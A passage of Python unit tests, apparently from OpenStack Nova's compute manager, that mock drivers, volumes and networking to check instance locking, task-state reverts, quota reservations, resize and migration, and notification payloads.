self.flags(vnc_enabled=True)
self.flags(enable=True, group='cells')
self.tokens_deleted = False
def fake_delete_tokens(*args, **kwargs):
self.tokens_deleted = True
cells_rpcapi = self.compute.cells_rpcapi
self.stubs.Set(cells_rpcapi, 'consoleauth_delete_tokens',
fake_delete_tokens)
self.compute._delete_instance(self.context, instance=instance,
bdms={})
self.assertTrue(self.tokens_deleted)
def test_instance_termination_exception_sets_error(self):
"""Test that we handle InstanceTerminationFailure
which is propagated up from the underlying driver.
"""
instance = self._create_fake_instance_obj()
def fake_delete_instance(context, instance, bdms,
reservations=None):
raise exception.InstanceTerminationFailure(reason='')
self.stubs.Set(self.compute, '_delete_instance',
fake_delete_instance)
self.compute.terminate_instance(self.context, instance=instance)
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(instance['vm_state'], vm_states.ERROR)
def test_network_is_deallocated_on_spawn_failure(self):
# When a spawn fails the network must be deallocated.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.mox.StubOutWithMock(self.compute, "_prep_block_device")
self.compute._prep_block_device(
mox.IgnoreArg(), mox.IgnoreArg(),
mox.IgnoreArg()).AndRaise(rpc_common.RemoteError('', '', ''))
self.mox.ReplayAll()
self.assertRaises(rpc_common.RemoteError,
self.compute.run_instance,
self.context, instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
def test_lock(self):
# FIXME(comstud): This test is such crap. This is testing
# compute API lock functionality in a test class for the compute
# manager by running an instance. Hello? We should just have
# unit tests in test_compute_api that test the check_instance_lock
# decorator and make sure that appropriate compute_api methods
# have the decorator.
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
non_admin_context = context.RequestContext(None,
None,
is_admin=False)
def check_task_state(task_state):
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], task_state)
# should fail with locked nonadmin context
inst_obj = instance_obj.Instance.get_by_uuid(self.context,
instance['uuid'])
self.compute_api.lock(self.context, inst_obj)
self.assertRaises(exception.InstanceIsLocked,
self.compute_api.reboot,
non_admin_context, inst_obj, 'SOFT')
check_task_state(None)
# should fail with invalid task state
self.compute_api.unlock(self.context, inst_obj)
instance = db.instance_update(self.context, instance_uuid,
{'task_state': task_states.REBOOTING})
inst_obj.refresh()
self.assertRaises(exception.InstanceInvalidState,
self.compute_api.reboot,
non_admin_context, inst_obj, 'SOFT')
check_task_state(task_states.REBOOTING)
# should succeed with admin context
instance = db.instance_update(self.context, instance_uuid,
{'task_state': None})
inst_obj.refresh()
self.compute_api.reboot(self.context, inst_obj, 'SOFT')
check_task_state(task_states.REBOOTING)
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(instance))
def _check_locked_by(self, instance_uuid, locked_by):
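"""Assert the instance's lock flag and lock owner; return the instance."""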
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['locked'], locked_by is not None)
self.assertEqual(instance['locked_by'], locked_by)
return instance
def test_override_owner_lock(self):
# FIXME(comstud): This test is such crap. This is testing
# compute API lock functionality in a test class for the compute
# manager by running an instance. Hello? We should just have
# unit tests in test_compute_api that test the check_instance_lock
# decorator and make sure that appropriate compute_api methods
# have the decorator.
admin_context = context.RequestContext('admin-user',
'admin-project',
is_admin=True)
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
# Ensure that an admin can override the owner lock
inst_obj = self._objectify(instance)
self.compute_api.lock(self.context, inst_obj)
self._check_locked_by(instance_uuid, 'owner')
self.compute_api.unlock(admin_context, inst_obj)
self._check_locked_by(instance_uuid, None)
def test_upgrade_owner_lock(self):
# FIXME(comstud): This test is such crap. This is testing
# compute API lock functionality in a test class for the compute
# manager by running an instance. Hello? We should just have
# unit tests in test_compute_api that test the check_instance_lock
# decorator and make sure that appropriate compute_api methods
# have the decorator.
admin_context = context.RequestContext('admin-user',
'admin-project',
is_admin=True)
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
# Ensure that an admin can upgrade the lock and that
# the owner can no longer unlock
inst_obj = self._objectify(instance)
self.compute_api.lock(self.context, inst_obj)
self.compute_api.lock(admin_context, inst_obj)
self._check_locked_by(instance_uuid, 'admin')
inst_obj.refresh()
self.assertRaises(exception.PolicyNotAuthorized,
self.compute_api.unlock,
self.context, inst_obj)
self._check_locked_by(instance_uuid, 'admin')
self.compute_api.unlock(admin_context, inst_obj)
self._check_locked_by(instance_uuid, None)
def _test_state_revert(self, instance, operation, pre_task_state,
kwargs=None):
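"""Put the instance into pre_task_state, make the operation fail, and
verify the task_state is reverted to None.
"""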
if kwargs is None:
kwargs = {}
# The API would have set task_state, so do that here to test
# that the state gets reverted on failure
db.instance_update(self.context, instance['uuid'],
{"task_state": pre_task_state})
orig_elevated = self.context.elevated
orig_notify = self.compute._notify_about_instance_usage
def _get_an_exception(*args, **kwargs):
raise test.TestingException()
self.stubs.Set(self.context, 'elevated', _get_an_exception)
self.stubs.Set(self.compute,
'_notify_about_instance_usage', _get_an_exception)
func = getattr(self.compute, operation)
self.assertRaises(test.TestingException,
func, self.context, instance=instance, **kwargs)
# self.context.elevated() is called in tearDown()
self.stubs.Set(self.context, 'elevated', orig_elevated)
self.stubs.Set(self.compute,
'_notify_about_instance_usage', orig_notify)
# Fetch the instance's task_state and make sure it reverted to None.
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(instance["task_state"], None)
def test_state_revert(self):
# Ensure that task_state is reverted after a failed operation.
actions = [
("reboot_instance", task_states.REBOOTING),
("stop_instance", task_states.POWERING_OFF),
("start_instance", task_states.POWERING_ON),
("terminate_instance", task_states.DELETING),
("power_off_instance", task_states.POWERING_OFF),
("power_on_instance", task_states.POWERING_ON),
("soft_delete_instance", task_states.SOFT_DELETING),
("restore_instance", task_states.RESTORING),
("rebuild_instance", task_states.REBUILDING,
{'orig_image_ref': None,
'image_ref': None,
'injected_files': [],
'new_pass': ''}),
("set_admin_password", task_states.UPDATING_PASSWORD),
("rescue_instance", task_states.RESCUING),
("unrescue_instance", task_states.UNRESCUING),
("revert_resize", task_states.RESIZE_REVERTING,
{'migration_id': None}),
("prep_resize", task_states.RESIZE_PREP,
{'image': {},
'instance_type': {}}),
("resize_instance", task_states.RESIZE_PREP,
{'migration_id': None,
'image': {}}),
("pause_instance", task_states.PAUSING),
("unpause_instance", task_states.UNPAUSING),
("suspend_instance", task_states.SUSPENDING),
("resume_instance", task_states.RESUMING),
]
want_objects = ['stop_instance', 'start_instance',
'terminate_instance', 'soft_delete_instance',
'revert_resize', 'confirm_resize'
]
instance = self._create_fake_instance()
inst_obj = instance_obj.Instance._from_db_object(
self.context, instance_obj.Instance(), instance,
expected_attrs=instance_obj.INSTANCE_DEFAULT_FIELDS)
for operation in actions:
if operation[0] in want_objects:
self._test_state_revert(inst_obj, *operation)
else:
self._test_state_revert(instance, *operation)
def _ensure_quota_reservations_committed(self, expect_project=False,
expect_user=False):
"""Mock up commit of quota reservations."""
reservations = list('fake_res')
self.mox.StubOutWithMock(nova.quota.QUOTAS, 'commit')
nova.quota.QUOTAS.commit(mox.IgnoreArg(), reservations,
project_id=(expect_project and
self.context.project_id or
None),
user_id=(expect_user and
self.context.user_id or
None))
self.mox.ReplayAll()
return reservations
def _ensure_quota_reservations_rolledback(self, expect_project=False,
expect_user=False):
"""Mock up rollback of quota reservations."""
reservations = list('fake_res')
self.mox.StubOutWithMock(nova.quota.QUOTAS, 'rollback')
nova.quota.QUOTAS.rollback(mox.IgnoreArg(), reservations,
project_id=(expect_project and
self.context.project_id or
None),
user_id=(expect_user and
self.context.user_id or
None))
self.mox.ReplayAll()
return reservations
def test_quotas_successful_delete(self):
instance = jsonutils.to_primitive(self._create_fake_instance())
resvs = self._ensure_quota_reservations_committed(True, True)
self.compute.terminate_instance(self.context, instance,
bdms=None, reservations=resvs)
def test_quotas_failed_delete(self):
instance = jsonutils.to_primitive(self._create_fake_instance())
def fake_shutdown_instance(*args, **kwargs):
raise test.TestingException()
self.stubs.Set(self.compute, '_shutdown_instance',
fake_shutdown_instance)
resvs = self._ensure_quota_reservations_rolledback(True, True)
self.assertRaises(test.TestingException,
self.compute.terminate_instance,
self.context, instance,
bdms=None, reservations=resvs)
def test_quotas_successful_soft_delete(self):
instance = jsonutils.to_primitive(self._create_fake_instance(
params=dict(task_state=task_states.SOFT_DELETING)))
resvs = self._ensure_quota_reservations_committed(True, True)
self.compute.soft_delete_instance(self.context, instance,
reservations=resvs)
def test_quotas_failed_soft_delete(self):
instance = jsonutils.to_primitive(self._create_fake_instance(
params=dict(task_state=task_states.SOFT_DELETING)))
def fake_soft_delete(*args, **kwargs):
raise test.TestingException()
self.stubs.Set(self.compute.driver, 'soft_delete',
fake_soft_delete)
resvs = self._ensure_quota_reservations_rolledback(True, True)
self.assertRaises(test.TestingException,
self.compute.soft_delete_instance,
self.context, instance,
reservations=resvs)
def test_quotas_destroy_of_soft_deleted_instance(self):
instance = jsonutils.to_primitive(self._create_fake_instance(
params=dict(vm_state=vm_states.SOFT_DELETED)))
# Termination should be successful, but the quota reservations are
# rolled back because the instance was in SOFT_DELETED state.
resvs = self._ensure_quota_reservations_rolledback()
self.compute.terminate_instance(self.context, instance,
bdms=None, reservations=resvs)
def _stub_out_resize_network_methods(self):
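# The resize tests don't exercise real networking, so no-op the
# network API calls made during resize setup and migration.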
def fake(cls, ctxt, instance, *args, **kwargs):
pass
self.stubs.Set(network_api.API, 'setup_networks_on_host', fake)
self.stubs.Set(network_api.API, 'migrate_instance_start', fake)
self.stubs.Set(network_api.API, 'migrate_instance_finish', fake)
def _test_finish_resize(self, power_on):
# Contrived test to ensure finish_resize doesn't raise anything and
# also tests resize from ACTIVE or STOPPED state which determines
# if the resized instance is powered on or not.
vm_state = None
if power_on:
vm_state = vm_states.ACTIVE
else:
vm_state = vm_states.STOPPED
params = {'vm_state': vm_state}
instance = self._create_fake_instance_obj(params)
image = 'fake-image'
disk_info = 'fake-disk-info'
instance_type = flavors.get_default_flavor()
instance.task_state = task_states.RESIZE_PREP
instance.save()
self.compute.prep_resize(self.context, instance=instance,
instance_type=instance_type,
image={})
instance.task_state = task_states.RESIZE_MIGRATED
instance.save()
# NOTE(mriedem): make sure prep_resize set old_vm_state correctly
sys_meta = instance.system_metadata
self.assertTrue('old_vm_state' in sys_meta)
if power_on:
self.assertEqual(vm_states.ACTIVE, sys_meta['old_vm_state'])
else:
self.assertEqual(vm_states.STOPPED, sys_meta['old_vm_state'])
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
orig_mig_save = migration.save
orig_inst_save = instance.save
network_api = self.compute.network_api
conductor_api = self.compute.conductor_api
self.mox.StubOutWithMock(network_api, 'setup_networks_on_host')
self.mox.StubOutWithMock(conductor_api,
'network_migrate_instance_finish')
self.mox.StubOutWithMock(self.compute, '_get_instance_nw_info')
self.mox.StubOutWithMock(self.compute,
'_notify_about_instance_usage')
self.mox.StubOutWithMock(self.compute.driver, 'finish_migration')
self.mox.StubOutWithMock(self.compute,
'_get_instance_volume_block_device_info')
self.mox.StubOutWithMock(migration, 'save')
self.mox.StubOutWithMock(instance, 'save')
self.mox.StubOutWithMock(self.context, 'elevated')
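# These side-effect callbacks assert the instance/migration state at
# the moment each save() happens during finish_resize.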
def _mig_save(context):
self.assertEqual(migration.status, 'finished')
self.assertEqual(vm_state, instance.vm_state)
self.assertEqual(task_states.RESIZE_FINISH, instance.task_state)
orig_mig_save()
def _instance_save1():
self.assertEqual(instance_type['id'],
instance.instance_type_id)
orig_inst_save()
def _instance_save2(expected_task_state=None):
self.assertEqual(task_states.RESIZE_MIGRATED,
expected_task_state)
self.assertEqual(task_states.RESIZE_FINISH, instance.task_state)
orig_inst_save(expected_task_state=expected_task_state)
def _instance_save3(expected_task_state=None):
self.assertEqual(task_states.RESIZE_FINISH,
expected_task_state)
self.assertEqual(vm_states.RESIZED, instance.vm_state)
self.assertEqual(None, instance.task_state)
self.assertIn('launched_at', instance.obj_what_changed())
orig_inst_save(expected_task_state=expected_task_state)
# First save to update flavor
instance.save().WithSideEffects(_instance_save1)
network_api.setup_networks_on_host(self.context, instance,
'fake-mini')
conductor_api.network_migrate_instance_finish(self.context,
mox.IsA(dict),
mox.IsA(dict))
self.compute._get_instance_nw_info(
self.context, instance).AndReturn('fake-nwinfo1')
# 2nd save to update task state
exp_kwargs = dict(expected_task_state=task_states.RESIZE_MIGRATED)
instance.save(**exp_kwargs).WithSideEffects(_instance_save2)
self.compute._notify_about_instance_usage(
self.context, instance, 'finish_resize.start',
network_info='fake-nwinfo1')
self.compute._get_instance_volume_block_device_info(
self.context, instance,
refresh_conn_info=True).AndReturn('fake-bdminfo')
# nova.conf sets the default flavor to m1.small and the test
# sets the default flavor to m1.tiny so they should be different
# which makes this a resize
self.compute.driver.finish_migration(self.context, migration,
instance, disk_info,
'fake-nwinfo1',
image, True,
'fake-bdminfo', power_on)
# Ensure instance status updates is after the migration finish
self.context.elevated().AndReturn(self.context)
migration.save(self.context).WithSideEffects(_mig_save)
exp_kwargs = dict(expected_task_state=task_states.RESIZE_FINISH)
instance.save(**exp_kwargs).WithSideEffects(_instance_save3)
self.compute._notify_about_instance_usage(
self.context, instance, 'finish_resize.end',
network_info='fake-nwinfo1')
# NOTE(comstud): This actually does the mox.ReplayAll()
reservations = self._ensure_quota_reservations_committed()
self.compute.finish_resize(self.context,
migration=migration,
disk_info=disk_info, image=image, instance=instance,
reservations=reservations)
def test_finish_resize_from_active(self):
self._test_finish_resize(power_on=True)
def test_finish_resize_from_stopped(self):
self._test_finish_resize(power_on=False)
def test_finish_resize_with_volumes(self):
"""Contrived test to ensure finish_resize doesn't raise anything."""
# create instance
instance = self._create_fake_instance_obj()
# create volume
volume_id = 'fake'
volume = {'instance_uuid': None,
'device_name': None,
'volume_id': volume_id}
# stub out volume attach
def fake_volume_get(self, context, volume):
return volume
self.stubs.Set(cinder.API, "get", fake_volume_get)
def fake_get_volume_encryption_metadata(self, context, volume_id):
return {}
self.stubs.Set(cinder.API, 'get_volume_encryption_metadata',
fake_get_volume_encryption_metadata)
orig_connection_data = {
'target_discovered': True,
'target_iqn': 'iqn.2010-10.org.openstack:%s.1' % volume_id,
'target_portal': '127.0.0.1:3260',
'volume_id': volume_id,
}
connection_info = {
'driver_volume_type': 'iscsi',
'data': orig_connection_data,
}
def fake_init_conn(self, context, volume, session):
return connection_info
self.stubs.Set(cinder.API, "initialize_connection", fake_init_conn)
def fake_attach(self, context, volume_id, instance_uuid, device_name):
volume['instance_uuid'] = instance_uuid
volume['device_name'] = device_name
self.stubs.Set(cinder.API, "attach", fake_attach)
# stub out virt driver attach
def fake_get_volume_connector(*args, **kwargs):
return {}
self.stubs.Set(self.compute.driver, 'get_volume_connector',
fake_get_volume_connector)
def fake_attach_volume(*args, **kwargs):
pass
self.stubs.Set(self.compute.driver, 'attach_volume',
fake_attach_volume)
# attach volume to instance
instance_p = obj_base.obj_to_primitive(instance)
self.compute.attach_volume(self.context, volume['volume_id'],
'/dev/vdc', instance_p)
# assert volume attached correctly
self.assertEquals(volume['device_name'], '/dev/vdc')
disk_info = db.block_device_mapping_get_all_by_instance(
self.context, instance.uuid)
self.assertEquals(len(disk_info), 1)
for bdm in disk_info:
self.assertEquals(bdm['device_name'], volume['device_name'])
self.assertEquals(bdm['connection_info'],
jsonutils.dumps(connection_info))
# begin resize
instance_type = flavors.get_default_flavor()
instance.task_state = task_states.RESIZE_PREP
instance.save()
self.compute.prep_resize(self.context, instance=instance,
instance_type=instance_type,
image={})
# fake out detach for prep_resize (and later terminate)
def fake_terminate_connection(self, context, volume, connector):
connection_info['data'] = None
self.stubs.Set(cinder.API, "terminate_connection",
fake_terminate_connection)
self._stub_out_resize_network_methods()
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
self.compute.resize_instance(self.context, instance=instance,
migration=migration, image={},
instance_type=jsonutils.to_primitive(instance_type))
# assert bdm is unchanged
disk_info = db.block_device_mapping_get_all_by_instance(
self.context, instance.uuid)
self.assertEquals(len(disk_info), 1)
for bdm in disk_info:
self.assertEquals(bdm['device_name'], volume['device_name'])
cached_connection_info = jsonutils.loads(bdm['connection_info'])
self.assertEquals(cached_connection_info['data'],
orig_connection_data)
# but connection was terminated
self.assertEquals(connection_info['data'], None)
# stub out virt driver finish_migration
def fake(*args, **kwargs):
pass
self.stubs.Set(self.compute.driver, 'finish_migration', fake)
instance.task_state = task_states.RESIZE_MIGRATED
instance.save()
reservations = self._ensure_quota_reservations_committed()
# new initialize connection
new_connection_data = dict(orig_connection_data)
new_iqn = 'iqn.2010-10.org.openstack:%s.2' % volume_id
new_connection_data['target_iqn'] = new_iqn
def fake_init_conn_with_data(self, context, volume, session):
connection_info['data'] = new_connection_data
return connection_info
self.stubs.Set(cinder.API, "initialize_connection",
fake_init_conn_with_data)
self.compute.finish_resize(self.context,
migration=migration,
disk_info={}, image={}, instance=instance,
reservations=reservations)
# assert volume attached correctly
disk_info = db.block_device_mapping_get_all_by_instance(
self.context, instance['uuid'])
self.assertEquals(len(disk_info), 1)
for bdm in disk_info:
self.assertEquals(bdm['connection_info'],
jsonutils.dumps(connection_info))
# stub out detach
def fake_detach(self, context, volume_uuid):
volume['device_path'] = None
volume['instance_uuid'] = None
self.stubs.Set(cinder.API, "detach", fake_detach)
# clean up
self.compute.terminate_instance(self.context, instance=instance)
def test_finish_resize_handles_error(self):
# Make sure we don't leave the instance in RESIZE on error.
def throw_up(*args, **kwargs):
raise test.TestingException()
def fake(*args, **kwargs):
pass
self.stubs.Set(self.compute.driver, 'finish_migration', throw_up)
self._stub_out_resize_network_methods()
reservations = self._ensure_quota_reservations_rolledback()
instance = self._create_fake_instance_obj()
instance_type = flavors.get_default_flavor()
self.compute.prep_resize(self.context, instance=instance,
instance_type=instance_type,
image={}, reservations=reservations)
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
instance.refresh()
instance.task_state = task_states.RESIZE_MIGRATED
instance.save()
self.assertRaises(test.TestingException, self.compute.finish_resize,
self.context,
migration=migration,
disk_info={}, image={}, instance=instance,
reservations=reservations)
# NOTE(comstud): error path doesn't use objects, so our object
# is not updated. Refresh and compare against the DB.
instance.refresh()
self.assertEqual(vm_states.ERROR, instance.vm_state)
def test_rebuild_instance_notification(self):
# Ensure notifications are generated on instance rebuild.
old_time = datetime.datetime(2012, 4, 1)
cur_time = datetime.datetime(2012, 12, 21, 12, 21)
timeutils.set_time_override(old_time)
inst_ref = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=inst_ref)
timeutils.set_time_override(cur_time)
fake_notifier.NOTIFICATIONS = []
instance = db.instance_get_by_uuid(self.context, inst_ref['uuid'])
orig_sys_metadata = db.instance_system_metadata_get(self.context,
inst_ref['uuid'])
image_ref = instance["image_ref"]
new_image_ref = image_ref + '-new_image_ref'
db.instance_update(self.context, inst_ref['uuid'],
{'image_ref': new_image_ref})
password = "new_password"
instance = db.instance_get_by_uuid(self.context, inst_ref['uuid'])
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.REBUILDING})
self.compute.rebuild_instance(self.context,
jsonutils.to_primitive(instance),
image_ref, new_image_ref,
injected_files=[],
new_pass=password,
orig_sys_metadata=orig_sys_metadata,
bdms=[])
instance = db.instance_get_by_uuid(self.context, inst_ref['uuid'])
image_ref_url = glance.generate_image_url(image_ref)
new_image_ref_url = glance.generate_image_url(new_image_ref)
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 3)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEquals(msg.event_type,
'compute.instance.exists')
self.assertEquals(msg.payload['image_ref_url'], image_ref_url)
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEquals(msg.event_type,
'compute.instance.rebuild.start')
self.assertEquals(msg.payload['image_ref_url'], new_image_ref_url)
self.assertEquals(msg.payload['image_name'], 'fake_name')
msg = fake_notifier.NOTIFICATIONS[2]
self.assertEquals(msg.event_type,
'compute.instance.rebuild.end')
self.assertEquals(msg.priority, 'INFO')
payload = msg.payload
self.assertEquals(payload['image_name'], 'fake_name')
self.assertEquals(payload['tenant_id'], self.project_id)
self.assertEquals(payload['user_id'], self.user_id)
self.assertEquals(payload['instance_id'], inst_ref['uuid'])
self.assertEquals(payload['instance_type'], 'm1.tiny')
type_id = flavors.get_flavor_by_name('m1.tiny')['id']
self.assertEquals(str(payload['instance_type_id']), str(type_id))
flavor_id = flavors.get_flavor_by_name('m1.tiny')['flavorid']
self.assertEquals(str(payload['instance_flavor_id']), str(flavor_id))
self.assertTrue('display_name' in payload)
self.assertTrue('created_at' in payload)
self.assertTrue('launched_at' in payload)
self.assertEqual(payload['launched_at'], timeutils.strtime(cur_time))
self.assertEquals(payload['image_ref_url'], new_image_ref_url)
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(inst_ref))
def test_finish_resize_instance_notification(self):
# Ensure notifications on instance migrate/resize.
old_time = datetime.datetime(2012, 4, 1)
cur_time = datetime.datetime(2012, 12, 21, 12, 21)
timeutils.set_time_override(old_time)
instance = self._create_fake_instance_obj()
new_type = flavors.get_flavor_by_name('m1.small')
new_type = jsonutils.to_primitive(new_type)
new_type_id = new_type['id']
flavor_id = new_type['flavorid']
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
instance.host = 'foo'
instance.task_state = task_states.RESIZE_PREP
instance.save()
self.compute.prep_resize(self.context, instance=instance,
instance_type=new_type, image={})
self._stub_out_resize_network_methods()
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
self.compute.resize_instance(self.context, instance=instance,
migration=migration, image={}, instance_type=new_type)
timeutils.set_time_override(cur_time)
fake_notifier.NOTIFICATIONS = []
self.compute.finish_resize(self.context,
migration=migration,
disk_info={}, image={}, instance=instance)
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEquals(msg.event_type,
'compute.instance.finish_resize.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEquals(msg.event_type,
'compute.instance.finish_resize.end')
self.assertEquals(msg.priority, 'INFO')
payload = msg.payload
self.assertEquals(payload['tenant_id'], self.project_id)
self.assertEquals(payload['user_id'], self.user_id)
self.assertEquals(payload['instance_id'], instance.uuid)
self.assertEquals(payload['instance_type'], 'm1.small')
self.assertEquals(str(payload['instance_type_id']), str(new_type_id))
self.assertEquals(str(payload['instance_flavor_id']), str(flavor_id))
self.assertTrue('display_name' in payload)
self.assertTrue('created_at' in payload)
self.assertTrue('launched_at' in payload)
self.assertEqual(payload['launched_at'], timeutils.strtime(cur_time))
image_ref_url = glance.generate_image_url(FAKE_IMAGE_REF)
self.assertEquals(payload['image_ref_url'], image_ref_url)
self.compute.terminate_instance(self.context, instance)
def test_resize_instance_notification(self):
# Ensure notifications on instance migrate/resize.
old_time = datetime.datetime(2012, 4, 1)
cur_time = datetime.datetime(2012, 12, 21, 12, 21)
timeutils.set_time_override(old_time)
instance = self._create_fake_instance_obj()
self.compute.run_instance(self.context, instance=instance)
timeutils.set_time_override(cur_time)
fake_notifier.NOTIFICATIONS = []
instance.host = 'foo'
instance.task_state = task_states.RESIZE_PREP
instance.save()
instance_type = flavors.get_default_flavor()
self.compute.prep_resize(self.context, instance=instance,
instance_type=instance_type, image={})
db.migration_get_by_instance_and_status(self.context.elevated(),
instance.uuid,
'pre-migrating')
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 3)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEquals(msg.event_type,
'compute.instance.exists')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEquals(msg.event_type,
'compute.instance.resize.prep.start')
msg = fake_notifier.NOTIFICATIONS[2]
self.assertEquals(msg.event_type,
'compute.instance.resize.prep.end')
self.assertEquals(msg.priority, 'INFO')
payload = msg.payload
self.assertEquals(payload['tenant_id'], self.project_id)
self.assertEquals(payload['user_id'], self.user_id)
self.assertEquals(payload['instance_id'], instance.uuid)
self.assertEquals(payload['instance_type'], 'm1.tiny')
type_id = flavors.get_flavor_by_name('m1.tiny')['id']
self.assertEquals(str(payload['instance_type_id']), str(type_id))
flavor_id = flavors.get_flavor_by_name('m1.tiny')['flavorid']
self.assertEquals(str(payload['instance_flavor_id']), str(flavor_id))
self.assertTrue('display_name' in payload)
self.assertTrue('created_at' in payload)
self.assertTrue('launched_at' in payload)
image_ref_url = glance.generate_image_url(FAKE_IMAGE_REF)
self.assertEquals(payload['image_ref_url'], image_ref_url)
self.compute.terminate_instance(self.context, instance=instance)
def test_prep_resize_instance_migration_error_on_same_host(self):
"""Ensure prep_resize raise a migration error if destination is set on
the same source host and allow_resize_to_same_host is false
"""
self.flags(host="foo", allow_resize_to_same_host=False)
instance = self._create_fake_instance_obj()
reservations = self._ensure_quota_reservations_rolledback()
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
instance.host = self.compute.host
instance.save()
instance_type = flavors.get_default_flavor()
self.assertRaises(exception.MigrationError, self.compute.prep_resize,
self.context, instance=instance,
instance_type=instance_type, image={},
reservations=reservations)
self.compute.terminate_instance(self.context, instance=instance)
def test_prep_resize_instance_migration_error_on_none_host(self):
"""Ensure prep_resize raises a migration error if destination host is
not defined
"""
instance = self._create_fake_instance_obj()
reservations = self._ensure_quota_reservations_rolledback()
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
instance.host = None
instance.save()
instance_type = flavors.get_default_flavor()
self.assertRaises(exception.MigrationError, self.compute.prep_resize,
self.context, instance=instance,
instance_type=instance_type, image={},
reservations=reservations)
self.compute.terminate_instance(self.context, instance=instance)
def test_resize_instance_driver_error(self):
# Ensure instance status set to Error on resize error.
def throw_up(*args, **kwargs):
raise test.TestingException()
self.stubs.Set(self.compute.driver, 'migrate_disk_and_power_off',
throw_up)
instance = self._create_fake_instance_obj()
instance_type = flavors.get_default_flavor()
reservations = self._ensure_quota_reservations_rolledback()
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
instance.host = 'foo'
instance.save()
self.compute.prep_resize(self.context, instance=instance,
instance_type=instance_type, image={},
reservations=reservations)
instance.task_state = task_states.RESIZE_PREP
instance.save()
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
# Verify that the driver error propagates out of resize_instance.
self.assertRaises(test.TestingException, self.compute.resize_instance,
self.context, instance=instance,
migration=migration, image={},
reservations=reservations,
instance_type=jsonutils.to_primitive(instance_type))
# NOTE(comstud): error path doesn't use objects, so our object
# is not updated. Refresh and compare against the DB.
instance.refresh()
self.assertEqual(instance.vm_state, vm_states.ERROR)
self.compute.terminate_instance(self.context, instance=instance)
def test_resize_instance_driver_rollback(self):
# Ensure instance status set to Running after rollback.
def throw_up(*args, **kwargs):
raise exception.InstanceFaultRollback(test.TestingException())
self.stubs.Set(self.compute.driver, 'migrate_disk_and_power_off',
throw_up)
instance = self._create_fake_instance_obj()
instance_type = flavors.get_default_flavor()
reservations = self._ensure_quota_reservations_rolledback()
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
instance.host = 'foo'
instance.save()
self.compute.prep_resize(self.context, instance=instance,
instance_type=instance_type, image={},
reservations=reservations)
instance.task_state = task_states.RESIZE_PREP
instance.save()
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
self.assertRaises(test.TestingException, self.compute.resize_instance,
self.context, instance=instance,
migration=migration, image={},
reservations=reservations,
instance_type=jsonutils.to_primitive(instance_type))
# NOTE(comstud): error path doesn't use objects, so our object
# is not updated. Refresh and compare against the DB.
instance.refresh()
self.assertEqual(instance.vm_state, vm_states.ACTIVE)
self.assertEqual(instance.task_state, None)
self.compute.terminate_instance(self.context, instance=instance)
def test_resize_instance(self):
# Ensure instance can be migrated/resized.
instance = self._create_fake_instance_obj()
instance_type = flavors.get_default_flavor()
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
instance.host = 'foo'
instance.save()
self.compute.prep_resize(self.context, instance=instance,
instance_type=instance_type, image={})
# verify 'old_vm_state' was set on system_metadata
instance.refresh()
sys_meta = instance.system_metadata
self.assertEqual(vm_states.ACTIVE, sys_meta['old_vm_state'])
self._stub_out_resize_network_methods()
instance.task_state = task_states.RESIZE_PREP
instance.save()
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
self.compute.resize_instance(self.context, instance=instance,
migration=migration, image={},
instance_type=jsonutils.to_primitive(instance_type))
self.assertEqual(migration.dest_compute, instance.host)
self.compute.terminate_instance(self.context, instance=instance)
def _test_confirm_resize(self, power_on):
# Common test case method for confirm_resize
def fake(*args, **kwargs):
pass
def fake_confirm_migration_driver(*args, **kwargs):
# Confirm the instance uses the new type in finish_resize
inst = args[1]
sys_meta = inst['system_metadata']
self.assertEqual(sys_meta['instance_type_flavorid'], '3')
old_vm_state = None
p_state = None
if power_on:
old_vm_state = vm_states.ACTIVE
p_state = power_state.RUNNING
else:
old_vm_state = vm_states.STOPPED
p_state = power_state.SHUTDOWN
params = {'vm_state': old_vm_state, 'power_state': p_state}
instance = self._create_fake_instance_obj(params)
self.flags(allow_resize_to_same_host=True)
self.stubs.Set(self.compute.driver, 'finish_migration', fake)
